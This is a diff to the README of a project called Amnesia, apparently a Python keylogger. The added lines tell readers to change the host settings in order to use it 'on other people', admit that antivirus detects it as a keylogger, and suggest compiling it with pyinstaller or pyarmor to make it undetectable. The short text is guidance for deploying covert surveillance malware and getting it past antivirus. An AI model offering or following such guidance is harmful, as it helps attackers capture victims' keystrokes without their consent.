o7raven/Amnesia/README.md

 ### Additional info

-If you want to change the appearance of a web page or create a completely new one, insert your index.html into [lingojam](https://lingojam.com/TexttoOneLine) to make it single-row
+If you want to change the appearance of a web page or create a completely new one, insert your index.html into [lingojam](https://lingojam.com/TexttoOneLine) to make it single-row</br>

+Don't forget to change the `hostName` and `host` if you want to try it on other people

+Antivirus will detect `amnesia.py` as a keylogger.
+To make it undetectable, you have to compile it into .exe.
+You can use tools like pyinstaller or pyarmor

 ## Note